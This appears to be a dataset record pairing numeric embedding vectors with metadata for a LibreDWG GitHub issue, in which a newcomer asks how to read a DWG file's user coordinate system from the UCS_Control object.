-0.02408256195485592, -0.022407252341508865, -0.0018917026463896036, 0.002772984793409705, 0.007399279624223709, -0.0031778509728610516, 0.013737530447542667, 0.0005942110437899828, -0.015259269624948502, 0.0011221077293157578, -0.0018114274134859443, -0.021429989486932755, 0.006076483987271786, -0.01701834239065647, 0.008683683350682259, -0.01604107953608036, 0.0034675397910177708, 0.013681687414646149, -0.0033820292446762323, 0.02346828207373619, -0.0032982637640088797, -0.01718587428331375, 0.012285596691071987, 0.009381728246808052, -0.00022064773656893522, -0.012306537479162216, -0.009681887924671173, -0.0008154041133821011, -0.01644594594836235, 0.012432185932993889, -0.012899876572191715, -0.01031710859388113, 0.004142898600548506, 0.013004583306610584, -0.016906656324863434, 0.0008520514820702374, 0.025743909180164337, 0.014714794233441353, 0.0030190458055585623, -0.023328673094511032, -0.004453528672456741, 0.007322494871914387, -0.0036821886897087097, -0.006743117235600948, 0.010498601011931896, 0.022881923243403435, -0.015440761111676693, -0.0015016698744148016, 0.017534896731376648, -0.00503290630877018, -0.005378438625484705, -0.0026717681903392076, -0.013416429981589317, -0.01918228343129158, -0.006170719861984253, -0.0038601902779191732, 0.001225069398060441, -0.014533301815390587, 0.023859186097979546, 0.00401725061237812, 0.007224768400192261, -0.0008655760902911425, 0.00017025759734679013, -0.012934778816998005, 0.0037834052927792072, 0.005497106350958347, 0.004111486487090588, -0.018386511132121086, 0.0053260852582752705, -0.0074690841138362885, 0.015887510031461716, 0.01701834239065647, 0.025520535185933113, -0.0047501977533102036, -0.0013655510265380144, -0.004467489663511515, -0.0017721623880788684, -0.010680092498660088, -0.008153168484568596, 0.012083163484930992, 0.0033139698207378387, 0.00270143523812294, 0.007252690382301807, 0.007364377379417419, -0.0037868954241275787, -0.005392399616539478, -0.0019859387539327145, -0.0063207997009158134, 0.008627839386463165, 0.005905462894588709, -0.023412438109517097, 0.03604705631732941, 0.0033593426924198866, 0.014365771785378456, -0.014463497325778008, -0.00849521066993475, -0.028117263689637184, -0.0006142798229120672, 0.005912443157285452, 0.007001393940299749, -0.00885121338069439, -0.009646985679864883, -0.004781609866768122, -0.0068303728476166725, 0.016627438366413116, -0.005130632780492306, 0.01498005073517561, 0.005451733246445656, 0.01606900244951248, 0.008676702156662941, 0.011859788559377193, -0.009416630491614342, 0.0022337448317557573, -0.00017811061115935445, 0.017130030319094658, 0.022574784234166145, -0.004673413001000881, 0.01770242676138878, -0.002882926957681775, 0.017772233113646507, 0.016362180933356285, 0.010833662003278732, 0.009172314777970314, 0.025618260726332664, 0.00576585391536355, 0.0019911741837859154, -0.0025827675126492977, 0.014009768143296242, 0.0035164030268788338, 0.018023528158664703, -0.001389110111631453, -0.014700832776725292, 0.027782201766967773, 0.01193657424300909, 0.015245308168232441, 0.010303148068487644, -0.008955921046435833, 0.01613880693912506, -0.0013882374623790383, 0.03258475288748741, 0.02323094569146633, 0.017646584659814835, -0.0024763154797255993, 0.004502391908317804, 0.011315313167870045, -0.012278616428375244, -0.008565015159547329, 0.00445003854110837, 0.004212703090161085, 0.005284202750772238, -0.0005798138445243239, 0.006205622106790543, -0.023566007614135742, 0.034260060638189316, -0.0008808458806015551, -0.014393692836165428, 0.018721573054790497, 0.019698837772011757, 0.017576780170202255, -0.00042493504588492215, 0.016529710963368416, -0.003406460862606764, -0.020983239635825157, 0.01830274611711502, -0.0015444251475855708, -0.005280712153762579, 0.010596326552331448, -0.005954326130449772, -0.006059032864868641, 0.013597921468317509, 0.005081769544631243, 0.002961457008495927, 0.004837453830987215, -0.013960905373096466, -0.011050056666135788, -0.026092931628227234, 0.004334860946983099, 0.0012015104293823242, 0.006826882716268301, 0.02144395001232624, -0.007943755015730858, 0.02901076152920723, 0.015035894699394703, 0.027879927307367325, 0.019950132817029953, 0.009479454718530178 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
I get the UCS_Control from the dwg_data and dont know what to do next. I'm really looking forward to some help.
I'm new to the project, could you please tell me how to read the UserCoordinateSystem of a dwg?
https://api.github.com/repos/LibreDWG/libredwg/issues/335/comments
3
2021-04-16T17:12:29
2021-04-17T15:05:56Z
https://github.com/LibreDWG/libredwg/issues/335
860,008,697
335
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : I'm new to the project, could you please tell me how to read the UserCoordinateSystem of a dwg? Issue date: --- start body --- I get the UCS_Control from the dwg_data and dont know what to do next. I'm really looking forward to some help. --- end body ---
318
[ 0.024786677211523056, 0.035820744931697845, -0.010452563874423504, 0.000298021623166278, 0.039367929100990295, -0.0069090137258172035, 0.03087794780731201, 0.04076354578137398, -0.018215663731098175, 0.015627963468432426, -0.0039360662922263145, -0.043176792562007904, 0.011433854699134827, -0.009551229886710644, 0.006076733581721783, 0.02405979484319687, -0.023827193304896355, 0.04675305262207985, -0.0028366572223603725, -0.00892611127346754, 0.047625310719013214, 0.02038177289068699, 0.0024150656536221504, 0.03849567100405693, -0.0028293882496654987, -0.002905710833147168, 0.0013038446195423603, 0.005895013455301523, -0.03302951902151108, -0.021908223628997803, 0.024466849863529205, 0.026095064356923103, -0.003739807987585664, 0.002346011810004711, 0.030034765601158142, -0.004106883425265551, 0.006316605024039745, 0.007472347468137741, -0.062453702092170715, 0.07146704196929932, -0.015715189278125763, -0.02083243802189827, 0.02404525689780712, 0.02631312981247902, -0.010714241303503513, -0.03250616416335106, -0.020599836483597755, 0.02360912784934044, 0.015235447324812412, 0.007305164355784655, 0.01025630533695221, -0.022780483588576317, -0.006207572296261787, -0.023361988365650177, 0.005022754892706871, -0.016456609591841698, 0.0483521930873394, 0.004045098554342985, 0.011237596161663532, 0.007421465590596199, 0.014435877092182636, 0.008620820939540863, -0.005030023865401745, 0.005942260380834341, -0.004005120135843754, 0.02625497803092003, -0.03744896128773689, 0.034076228737831116, -0.004041464067995548, 0.007726755924522877, 0.021254030987620354, 0.026356741786003113, 0.02432147227227688, 0.00040591819561086595, 0.011121295392513275, -0.0033291196450591087, 0.04957335442304611, 0.03332027047872543, 0.017706846818327904, 0.03750711306929588, -0.016558373346924782, 0.00861355196684599, -0.0245104618370533, -0.011143101379275322, 0.0015246350085362792, 0.002195183653384447, -0.008344605565071106, -0.06175589561462402, 0.0048555717803537846, 0.02012009546160698, -0.051492322236299515, 0.04343847185373306, -0.008002971298992634, -0.031488530337810516, 0.0006387475878000259, -0.025818848982453346, 0.02122495509684086, -0.01940775103867054, -0.011143101379275322, -0.03340749815106392, 0.012291574850678444, 0.04204285517334938, -0.020745212212204933, -0.026269515976309776, 0.042275458574295044, 0.00699623953551054, 0.03954238072037697, 0.030907023698091507, -0.011273940093815327, 0.06698944419622421, 0.014581253752112389, -0.01334555447101593, 0.028232097625732422, 0.015424436889588833, -0.0286973025649786, 0.02824663557112217, -0.003298227209597826, -0.04750901088118553, 0.006963529624044895, -0.024801215156912804, -0.008526326157152653, 0.022896783426404, 0.006614626385271549, -0.026589345186948776, -0.025106504559516907, 0.047683462500572205, -0.0050590988248586655, -0.0032418938353657722, 0.005469787400215864, 0.01157196145504713, -0.00754503533244133, -0.040530942380428314, -0.03570444509387016, 0.0046338727697730064, 0.024452311918139458, 0.04186840355396271, 0.011259403079748154, 0.045677267014980316, 0.016398457810282707, 0.013767145574092865, -0.04105429723858833, -0.04486315697431564, 0.0002423697296762839, 0.0005306238890625536, -0.03436698392033577, 0.02275140769779682, 0.005157228093594313, 0.004506668541580439, 0.02986031398177147, -0.0209487397223711, -0.021065041422843933, -0.025746161118149757, 0.009471273049712181, -0.008657164871692657, 0.06483788043260574, -0.0032164528965950012, -0.032913219183683395, 0.02320207469165325, 0.009224132634699345, 0.03282599151134491, 0.010874154977500439, -0.02714177407324314, -0.007272454909980297, -0.019116997718811035, 0.0322444885969162, 0.002391441958025098, 0.002291495678946376, 0.0348031111061573, -0.01740155555307865, 0.005418905522674322, 0.0015355382347479463, -0.03395992890000343, 0.009674799628555775, 0.0064292713068425655, 0.008155616000294685, -0.019509512931108475, -0.019262373447418213, 0.0022387965582311153, -0.020032867789268494, -0.034977562725543976, -0.015627963468432426, -0.02991846390068531, 0.020599836483597755, 0.03628595173358917, 0.0038524747360497713, -0.012967575341463089, 0.03204096108675003, 0.0022333450615406036, 0.002734893700107932, 0.015700651332736015, 0.00472473306581378, 0.029714936390519142, 0.013432780280709267, 0.02167562209069729, -0.006916282698512077, -0.021123191341757774, 0.012822198681533337, -0.0031165066175162792, 0.0028820871375501156, -0.0029602269642055035, 0.010488907806575298, 0.012291574850678444, 0.010874154977500439, -0.00806112214922905, -0.0016245812876150012, 0.0018262910889461637, -0.02901712991297245, 0.021835535764694214, -0.03494848683476448, -0.034657735377550125, -0.009921940043568611, -0.018811706453561783, 0.01914607174694538, 0.014624866656959057, -0.018404653295874596, 0.017576007172465324, 0.03855382278561592, -0.01063428446650505, 0.003272786270827055, -0.03584982082247734, 0.054138172417879105, -0.04041464254260063, 0.044456105679273605, -0.021704697981476784, -0.05282978713512421, 0.0013538177590817213, 0.013483661226928234, 0.0014873823383823037, -0.023216612637043, -0.012720435857772827, 0.009907402098178864, -0.0065346695482730865, 0.012822198681533337, 0.0031146896071732044, 0.003594431560486555, -0.022068139165639877, 0.015686113387346268, -0.02618229016661644, -0.06024398282170296, -0.03250616416335106, -0.0010730596259236336, 0.018026674166321754, 0.016151318326592445, -0.030092915520071983, 0.028014034032821655, 0.04343847185373306, 0.0017708663363009691, -0.0012247961713001132, 0.006203938275575638, -0.005000948440283537, 0.03771064057946205, 0.0445142537355423, 0.045357439666986465, -0.009631186723709106, 0.03448328375816345, 0.017517857253551483, 0.016035016626119614, 0.020192783325910568, 0.007886669598519802, -0.010568864643573761, 0.032796915620565414, 0.04131597280502319, -0.008519057184457779, -0.03361102566123009, -0.0006405647727660835, -0.017706846818327904, 0.02102142758667469, -0.01253871526569128, 0.005106346216052771, -0.027679666876792908, 0.031168701127171516, 0.014479489997029305, 0.024743063375353813, -0.006720024161040783, -0.029380571097135544, 0.008388218469917774, -0.0043104104697704315, 0.019553126767277718, -0.0030365497805178165, -0.0425371378660202, -0.01663106121122837, 0.0299766156822443, -0.025818848982453346, 0.007443272043019533, -0.015206372365355492, -0.03980406001210213, 0.0012520542368292809, -0.01844826526939869, -0.023303838446736336, -0.02288224548101425, -0.015831490978598595, 0.005048195831477642, -0.013221983797848225, -0.007148884702473879, 0.005393464583903551, 0.020599836483597755, 0.0018680868670344353, -0.05852854251861572, -0.04285696521401405, -0.05373112112283707, 0.01857910491526127, -0.007886669598519802, -0.008388218469917774, -0.01818658784031868, 0.02075975015759468, 0.018346501514315605, 0.0016136780614033341, -0.011266671121120453, -0.01631123200058937, -0.02004740573465824, 0.061290692538022995, -0.03599519655108452, -0.04945705458521843, -0.01876809448003769, 0.022344352677464485, -0.02528095617890358, 0.028159409761428833, -0.02922065742313862, -0.01106314454227686, 0.005208109505474567, -0.0386991985142231, 0.003572625108063221, -0.03192465752363205, -0.02488844096660614, 0.05596991628408432, -0.004226819146424532, -0.041432276368141174, 0.01270589791238308, 0.022402504459023476, -0.0035162917338311672, -0.007515960372984409, 0.0187099426984787, 0.011332090944051743, -0.004125055391341448, 0.024001644924283028, -0.037623412907123566, 0.022911321371793747, 0.01959673874080181, -0.02734530158340931, -0.023042161017656326, 0.012618672102689743, 0.04314771667122841, -0.022620568051934242, -0.022475192323327065, 0.03663485497236252, -0.0022496997844427824, 0.04660767689347267, 0.02424878440797329, 0.0020697966683655977, 0.05928449705243111, 0.0007963901152834296, 0.03262246400117874, -0.005360755138099194, -0.006018583197146654, 0.018550029024481773, -0.007515960372984409, -0.005106346216052771, -0.05649327114224434, 0.019713040441274643, 0.004692023620009422, 0.004866475239396095, -0.04343847185373306, -0.009122369810938835, 0.053614817559719086, 0.0035181089770048857, 0.023245686665177345, 0.02081790193915367, -0.014421339146792889, 0.004768345970660448, -0.009740219451487064, -0.017576007172465324, 0.014232350513339043, 0.020730676129460335, -0.02657480724155903, -0.04346754401922226, -0.01053978968411684, -0.02449592389166355, 0.006778175011277199, -0.009049681015312672, 0.02122495509684086, -0.012451489455997944, -0.008075659163296223, 0.019829342141747475, -0.02528095617890358, 0.04050186648964882, 0.03529739007353783, 0.004590259864926338, 0.004008754156529903, 0.0008413659525103867, -0.008039315231144428, -0.02629859186708927, -0.0008004788542166352, 0.023507364094257355, -0.03364010155200958, -0.01121578924357891, 0.020091019570827484, -0.012342456728219986, -0.0032273561228066683, 0.03616964817047119, -0.005702389404177666, -0.0007605003193020821, -0.015744265168905258, 0.00444851815700531, -0.023260224610567093, 0.0030365497805178165, 0.001917151384986937, -0.03695468232035637, -0.031052399426698685, 0.019785728305578232, 0.018331965431571007, -0.02862461470067501, -0.0014001565286889672, -0.024292398244142532, 0.018419191241264343, 0.029438722878694534, 0.017590545117855072, -0.0503002367913723, 0.026545731350779533, -0.04631692171096802, 0.02134125679731369, 0.01631123200058937, -0.007119809277355671, -0.020788826048374176, 0.01825927570462227, -0.018942546099424362, 0.006014948710799217, -0.02391441911458969, -0.01006004773080349, 0.03297136723995209, -0.008126541040837765, -0.007959358394145966, 0.024975666776299477, -0.01437772624194622, 0.045677267014980316, 0.0038633779622614384, -0.016194932162761688, -0.0003981950576417148, -0.026095064356923103, -0.0001838784373831004, 0.0267492588609457, -0.00019466810044832528, 0.0348031111061573, 0.012727703899145126, -0.023216612637043, 0.040269263088703156, 0.027069086208939552, -0.04681120440363884, -0.009035144001245499, 0.021908223628997803, -0.023129386827349663, -0.024466849863529205, -0.022009987384080887, 0.011404778808355331, -0.010488907806575298, -0.020599836483597755, -0.025324570015072823, -0.01844826526939869, -0.004172302782535553, 0.0044594211503863335, 0.002776689361780882, -0.017183491960167885, 0.006690949201583862, 0.014973769895732403, -0.012008091434836388, 0.035617221146821976, 0.03837937116622925, 0.01263321004807949, -0.010161810554564, 0.004277700558304787, 0.02831932343542576, 0.00944946613162756, -0.009493079036474228, 0.04806143790483475, -0.0022424310445785522, -0.028450163081288338, 0.029496872797608376, -0.03183743357658386, -0.004517572000622749, -0.020992353558540344, -0.04250806197524071, 0.015119146555662155, -0.02946779690682888, -0.056202519685029984, -0.007690411992371082, -0.02663295716047287, -0.024801215156912804, -0.0028620979283005, -0.01908792182803154, -0.035500917583703995, 0.017488781362771988, 0.01772138476371765, 0.04151950031518936, -0.015598888508975506, -0.0380304679274559, -0.010416219010949135, 0.020091019570827484, 0.010496176779270172, 0.016151318326592445, 0.027970420196652412, -0.0015627964166924357, 0.00046406875480897725, 0.011034069582819939, -0.0045357439666986465, 0.025440871715545654, 0.02991846390068531, 0.03715820983052254, -0.02650211937725544, 0.01273497287184, -0.014305038377642632, -0.027228999882936478, 0.03817584365606308, -0.02483028918504715, 0.026400355622172356, -0.008838885463774204, -0.011935402639210224, -0.00635294895619154, 0.004350388888269663, 0.02766513079404831, 0.03564629331231117, -0.007152519188821316, -0.03712913393974304, -0.015148221515119076, -0.002195183653384447, 0.010408950969576836, 0.035617221146821976, 0.04692750424146652, -0.017517857253551483, 0.0022642374970018864, -0.016994502395391464, 0.019044309854507446, 0.0071089062839746475, -0.019247835502028465, 0.017183491960167885, 0.019102459773421288, -0.0034490551333874464, -0.007163422182202339, -0.017314329743385315, 0.020149169489741325, 0.016282157972455025, -0.005651507992297411, -0.028784528374671936, 0.028653688728809357, -0.021806461736559868, 0.0006246642442420125, -0.016238544136285782, -0.012037166394293308, -0.004612066317349672, 0.03018014132976532, -0.010358069092035294, -0.006465615704655647, -0.016078630462288857, -0.010038240812718868, -0.018622716888785362, 0.0005465244175866246, -0.0028620979283005, 0.007690411992371082, 0.007944820448756218, -0.024990204721689224, 0.009565767832100391, -0.003801593091338873, 0.03631502762436867, 0.012029897421598434, 0.013309209607541561, 0.007843056693673134, -0.008889767341315746, 0.013171101920306683, -0.010605208575725555, 0.04396182671189308, -0.005836862605065107, -0.042071931064128876, 0.015395360998809338, 0.013120220974087715, 0.002934786258265376, 0.036140576004981995, 0.01053978968411684, -0.00899879913777113, 0.014101511798799038, 0.011295747011899948, 0.009464004077017307, -0.01298938225954771, 0.0016909092664718628, -0.0238562673330307, -0.007127078250050545, 0.007646799087524414, 0.0025531731080263853, 0.013389167375862598, -0.013934328220784664, -0.03715820983052254, 0.013338285498321056, -0.03256431594491005, -0.0005542475264519453, 0.018869858235120773, 0.006919916719198227, 0.020105557516217232, 0.02173377200961113, -0.004372195340692997, 0.008206497877836227, 0.01785222254693508, 0.012909424491226673, -0.042973265051841736, -0.003739807987585664, 0.03835029527544975, 0.03177928179502487, -0.010757854208350182, -0.05076543986797333, -0.03893180191516876, 0.01315656490623951, 0.0011857262579724193, -0.008962455205619335, -0.0022715062368661165, -0.027577904984354973, 0.029555022716522217, 0.02907528169453144, -0.010147273540496826, 0.023391064256429672, -0.01002370286732912, -0.010030971840023994, 0.01586056500673294, 0.004822862334549427, -0.025629859417676926, -0.010438025929033756, 0.007018045987933874, 0.007250648457556963, -0.031575754284858704, 0.032913219183683395, 0.012662285007536411, -0.007406927645206451, -0.0128948874771595, -0.013810758478939533, 0.016543835401535034, 0.0029856679029762745, -0.023507364094257355, -0.010234499350190163, -0.003301861695945263, -0.003550818655639887, 0.04521206393837929, -0.0014710274990648031, -0.01876809448003769, -0.004237722139805555, 0.026196828112006187, -0.03012199141085148, 0.03521016612648964, -0.026269515976309776, 0.037041909992694855, 0.001149382209405303, 0.016790974885225296, 0.034599583595991135, 0.004244991112500429, 0.00553157227113843, 0.004346754401922226, -0.040589094161987305, -0.018201125785708427, -0.0026585711166262627, -0.0016236727824434638, 0.02017824538052082, 0.022780483588576317, 0.011913596652448177, 0.02365274168550968, -0.004466690123081207, -0.015773339197039604, 0.006836325395852327, -0.016805512830615044, -0.007515960372984409, -0.01831742748618126, 0.006411099340766668, -0.02057076059281826, 0.0011084950529038906, 0.0020752481650561094, -0.02533910796046257, 0.0167618989944458, -0.007123443763703108, -0.008242841809988022, 0.01170280110090971, -0.01599140465259552, -0.015816953033208847, 0.002620409708470106, -0.04070539399981499, -0.014101511798799038, -0.029438722878694534, -0.008504520170390606, 0.01882624439895153, -0.02528095617890358, 0.021501170471310616, -0.01857910491526127, -0.022678719833493233, 0.010837811045348644, -0.02805764600634575, -0.02701093629002571, 0.007443272043019533, -0.03919347748160362, 0.008460907265543938, 0.03753618896007538, 0.005346217192709446, 0.003808861831203103, -0.01565703935921192, -0.02967132441699505, 0.021762847900390625, -0.015162759460508823, 0.0002948415349237621, 0.00033663722570054233, -0.026851022616028786, 0.0267492588609457, 0.025906074792146683, -0.004274066537618637, 0.015831490978598595, 0.024481385946273804, 0.014392264187335968, 0.0014019736554473639, -0.0058550345711410046, -0.005389830097556114, -0.015613425523042679, -0.02004740573465824, -0.04849756881594658, 0.018041212111711502, -0.02365274168550968, -0.011419316753745079, 0.008577208034694195, 0.013977941125631332, -0.023696353659033775, -0.002191549399867654, -0.03300044313073158, 0.013767145574092865, 0.02456861175596714, -0.052655335515737534, -0.004364926367998123, -0.0043394858948886395, 0.014944694936275482, -0.024990204721689224, 0.007566841784864664, 0.019582202658057213, 0.011223058216273785, -0.0016863662749528885, 0.020687062293291092, 0.010597939603030682, 0.001788129797205329, -0.019771190360188484, 0.027330763638019562, 0.01070697233080864, 0.00501185143366456, -0.0024550440721213818, -0.00039410634781233966, -0.0028675496578216553, 0.021573858335614204, -0.01121578924357891, 0.0019825706258416176, -0.022387966513633728, -0.019683964550495148, 0.019175147637724876, -0.050125785171985626, -0.015133683569729328, 0.03791416808962822, 0.004924625623971224, 0.02991846390068531, -0.024902978911995888, 0.009384047240018845, 0.018346501514315605, 0.030005689710378647, -0.004423077218234539, 0.005666045472025871, 0.019436825066804886, -0.004877378232777119, 0.04306049272418022, -0.03305859491229057, 0.027825044468045235, 0.03643132746219635, -0.012560521252453327, 0.014341382309794426, -0.014697554521262646, 0.020905127748847008, -0.004321313463151455, -0.004364926367998123, 0.047160107642412186, 0.02586246281862259, -0.017561469227075577, 0.01556981261819601, -0.0068326909095048904, 0.010714241303503513, -0.05649327114224434, -0.040385566651821136, 0.005193572025746107, -0.015162759460508823, -0.02030908316373825, -0.007479615975171328, -0.001520092017017305, 0.01882624439895153, -0.007821250706911087, -0.006062196101993322, -0.008577208034694195, -0.021835535764694214, -0.0005592448869720101, -0.002324205357581377, -0.022344352677464485, 0.011651919223368168, -0.004212281201034784, 0.04573541879653931, 0.0007786724017933011, -0.0050336578860878944, 0.027301689609885216, -0.015584350563585758, 0.005324410740286112, 0.03771064057946205, -0.00906421896070242, -0.009798369370400906, -0.034657735377550125, 0.02507743053138256, -0.0027694206219166517, -0.0036816573701798916, 0.02631312981247902, -0.05172492563724518, 0.01972757838666439, -0.007559573277831078, 0.011942671611905098, 0.019683964550495148, 0.05344036594033241, 0.007799444254487753, -0.026865560561418533, 0.0010948660783469677, -0.008758928626775742, 0.056260667741298676, 0.041286900639534, -0.01109221950173378, 0.00028779986314475536, 0.006647336296737194, -0.02243157848715782, -0.005513400305062532, -0.029438722878694534, 0.01722710393369198, 0.006687314715236425, 0.0199892558157444, 0.003701646812260151, -0.0016254899092018604, 0.018157513812184334, -0.026851022616028786, 0.0033745497930794954, -0.004252260085195303, 0.031953733414411545, 0.004590259864926338, -0.00996555294841528, -0.020527148619294167, 0.011622843332588673, -0.01154288649559021, -0.028290249407291412, -0.009536691941320896, -0.002891173353418708, -0.011840907856822014, 0.004226819146424532, 0.0016472963616251945, -0.01636938378214836, 0.012291574850678444, 0.019829342141747475, 0.016732824966311455, 0.0007668605539947748, -0.017692308872938156, 0.01199355348944664, -0.006959895603358746, 0.00116028543561697, -0.0016972695011645555, 0.010132735595107079, 0.013207446783781052, -0.046433225274086, 0.04358384758234024, -0.005030023865401745, -0.008860692381858826, -0.007697680499404669, -0.0030892486684024334, -0.03753618896007538, 0.007068927865475416, 0.013047532178461552, 0.04521206393837929, 0.03262246400117874, -0.03951330855488777, 0.02173377200961113, 0.027447065338492393, -0.01901523396372795, -0.013025726191699505, -0.034657735377550125, -0.015962328761816025, 0.011768219992518425, 0.0011575596872717142, 0.031488530337810516, -0.025368181988596916, 0.017139878123998642, -0.009762025438249111, 0.03448328375816345, 0.02475760132074356, -0.04146135225892067, 0.013389167375862598, -0.00793028250336647, -0.0008945192093960941, -0.020483534783124924, 0.012785854749381542, 0.03599519655108452, -0.01916060969233513, -0.04076354578137398, 0.010307187214493752, 0.030965173617005348, -0.010619746521115303, 0.01920422352850437, -0.007959358394145966, 0.022213514894247055, -0.01831742748618126, -0.014930156990885735, 0.02657480724155903, -0.02933695912361145, 0.022780483588576317, -0.023420138284564018, 0.03430883213877678, -0.005716927349567413, 0.019175147637724876, 0.031633906066417694, 0.013440048322081566, 0.00013776685227639973, -0.0216029342263937, -0.006229379214346409, -0.002256968757137656, 0.0051099807024002075, -0.03207003325223923, -0.007806712761521339, 0.020265471190214157, 0.022678719833493233, -0.020280009135603905, -0.007675874046981335, 0.010074584744870663, 0.0018971620593219995, 0.01889893226325512, -0.027490679174661636, -0.045677267014980316, 0.011884520761668682, -0.008657164871692657, 0.00718886312097311, -0.04745085909962654, -0.00010443250357639045, 0.026909172534942627, -0.017503319308161736, 0.001260231714695692, 0.002680377569049597, -0.00996555294841528, -0.008453638292849064, -0.009740219451487064, -0.007123443763703108, 0.020221857354044914, -0.0025749795604497194, 0.016078630462288857, 0.009674799628555775, -0.002980216406285763, 0.006869035307317972, -0.008955186232924461, -0.0077340248972177505, 0.011760951019823551, -0.04224638268351555, -0.00793028250336647, -0.012960306368768215, -0.054777830839157104, 0.00802477728575468, 0.0056333355605602264, -0.008112003095448017, -0.008206497877836227, 0.0043104104697704315, -0.010096391662955284, 0.012502371333539486, -0.03849567100405693, 0.03241894021630287, -0.02387080527842045, -0.006927185691893101, -0.008359143510460854, 0.014915619045495987, -0.02282409556210041, 0.015075533650815487, -0.010496176779270172, -0.001367446850053966, 0.011295747011899948, -0.01811389997601509, -0.0021424847654998302, 0.016224006190896034, -0.023434676229953766, 0.019582202658057213, 0.0026549366302788258, 0.02043992280960083, -0.00816288497298956, 0.00014548997569363564, -0.022678719833493233, -0.02631312981247902, 0.018390115350484848, 0.005753271281719208, -0.0032328078523278236, -0.03270969167351723, 0.01766323298215866, 0.009289552457630634, -0.011564693413674831, 0.01914607174694538, -0.003605334786698222, 0.012742241844534874, -0.001170280040241778, -0.03919347748160362, 0.015031920745968819, 0.00793028250336647, 0.02856646291911602, -0.000286436959868297, -0.029714936390519142, -0.018070288002490997, -0.004543012473732233, 0.003376367036253214, 0.01901523396372795, 0.0069380891509354115, -0.014290500432252884, 0.012298843823373318, 0.006131249945610762, 0.0004579356755129993, -0.03489033877849579, -0.008373680524528027, -0.029438722878694534, -0.025906074792146683, 0.0038597434759140015, -0.03622779995203018, -0.016107706353068352, -0.02077428810298443, -0.013403704389929771, 0.001545532955788076, 0.04050186648964882, 0.013032995164394379, -0.014661210589110851, 0.0018571835244074464, 0.018680868670344353, 0.001984387869015336, -0.00935497134923935, 0.006302067078649998, -0.006044024135917425, 0.0035417326726019382, 0.015627963468432426, -0.0017181674484163523, 0.025586247444152832, -0.03660577908158302, 0.008431831374764442, 0.001717258826829493, -0.005487959366291761, -0.008300992660224438, -0.0212831050157547, -0.07582833617925644, 0.0071089062839746475, 0.030732572078704834, 0.05428354814648628, 0.020687062293291092, -0.009485810063779354, -0.0046338727697730064, -0.009725681506097317, 0.008242841809988022, 0.03177928179502487, -0.011026800610125065, -0.031633906066417694, -0.009565767832100391, 0.014021554030478, 0.02475760132074356, 0.06326781213283539, -0.039891283959150314, 0.023332912474870682, -0.0005015485803596675, -0.03890272602438927, -0.022155364975333214, 0.02288224548101425, 0.019553126767277718, -0.011630112305283546, -0.014501296915113926, 0.023827193304896355, -0.03680930659174919, 0.004782883916050196, 0.003783420892432332, 0.020032867789268494, -0.010263574309647083, 0.0027930440846830606, 0.009333165362477303, -0.014014285057783127, 0.03334934636950493, 0.009202326647937298, -0.016979964450001717, 0.03366917371749878, -0.01953858882188797, 0.018535491079092026, -0.0032691520173102617, -0.01663106121122837, -0.008860692381858826, 0.03619872406125069, -0.016471147537231445, 0.004801055882126093, 0.008330067619681358, -0.010358069092035294, 0.03134315460920334, 0.03029644303023815, 0.0005774169112555683, -0.004165033809840679, -0.01664559915661812, -0.031372226774692535, -0.026153216138482094, -0.0024186999071389437, -0.013258327730000019, -0.014646672643721104, -0.019335061311721802, 0.012865811586380005, 0.06454712152481079, 0.0008231938700191677, -0.005004582926630974, 0.01972757838666439, 0.02967132441699505, -0.0004243173752911389, 0.003390904748812318, -0.003612603759393096, -0.01636938378214836, 0.01498830784112215, 0.019422287121415138, 0.01173187606036663, -0.0035853455774486065, -0.016078630462288857, 0.01315656490623951, -0.034076228737831116, 0.008388218469917774, -0.01315656490623951, 0.018230201676487923, -0.018986158072948456, -0.02049807272851467, 0.0380304679274559, 0.01644207164645195, -0.0167618989944458, 0.012269768863916397, 0.011412047781050205, 0.025789774954319, -0.023100310936570168, -0.02907528169453144, 0.025353645905852318, -0.010852348990738392, 0.010808736085891724, 0.009202326647937298, 0.012233424931764603, -0.0007795809651724994, -0.01028538029640913, 0.020338159054517746, -0.018811706453561783, -0.015031920745968819, -0.004742905031889677, -0.003576259594410658, 0.0004247716860845685, -0.008838885463774204, -0.010503445751965046, 0.0032746035140007734, -0.021050503477454185, 0.006127615459263325, 0.011688263155519962, -0.0032855067402124405, -0.030383668839931488, 0.023361988365650177, 0.008657164871692657, 0.012458758428692818, -0.014712092466652393, 0.0015927802305668592, 0.012131661176681519, 0.01753239519894123, -0.0009585756924934685, -0.009260477498173714, -0.01382529642432928, 0.00844636932015419, -0.004473959095776081, -0.0031855604611337185, 0.01006004773080349, 0.020192783325910568, 0.023231148719787598, -0.04881739616394043, 0.011339359916746616, 0.014363189227879047, 0.025760699063539505, -0.017881298437714577, 0.04532836377620697, 0.004346754401922226, -0.007421465590596199, -0.0010185434948652983, 0.005077270790934563, 0.019364137202501297, 0.05550471320748329, -0.021326718851923943, -0.008002971298992634, 0.03928070515394211, 0.0027439796831458807, 0.019233297556638718, 0.022024525329470634, 0.02276594564318657, 0.019785728305578232, -0.01321471482515335, -0.005716927349567413, -0.01722710393369198, -0.021355794742703438, -0.008678971789777279, 0.044775933027267456, 0.01753239519894123, -0.003794324118643999, 0.005778712220489979, -0.03753618896007538, 0.04279881343245506, -0.004150496330112219, 0.00672365864738822, 0.00935497134923935, -0.009951015003025532, -0.006563744507730007, 0.015119146555662155, 0.003056538989767432, 0.031430378556251526, -0.005713292863219976, -0.007196132093667984, 0.019175147637724876, 0.011179445311427116, -0.00417593726888299, -0.01463213562965393, 0.004622969776391983, 0.01857910491526127, -0.03616964817047119, -0.01237880066037178, 0.005742367822676897, 0.001602774835191667, 0.006665508262813091, -0.013163833878934383, -0.017009040340781212, -0.017299791797995567, -0.021035965532064438, 0.028130333870649338, -0.011462929658591747, 0.02714177407324314, 0.0021552052348852158, -0.004786517936736345, -0.0034817648120224476, 0.01357088703662157, 0.0019335062243044376, 0.0393097810447216, 0.004212281201034784, 0.019902030006051064, -0.0041395933367311954, 0.04119967296719551, -0.0034217971842736006, 0.011114026419818401, -0.002898442093282938, -0.019305987283587456, -0.009791101329028606, -0.0019262373680248857, 0.0064292713068425655, -0.014573984779417515, -0.009878327138721943, 0.0037289047613739967, 0.008344605565071106, 0.010154541581869125, 0.004757442977279425, -0.0043358514085412025, 0.038466595113277435, -0.0038706467021256685, 0.03320397064089775, 0.02669110894203186, 0.0016055006999522448, -0.009689337573945522, 0.01137570384889841, 0.0199892558157444, 0.018550029024481773, -0.004561184905469418, -0.02881360426545143, 0.009500348009169102, 0.004488496575504541, 0.017561469227075577, 0.013818027451634407, -0.013163833878934383, 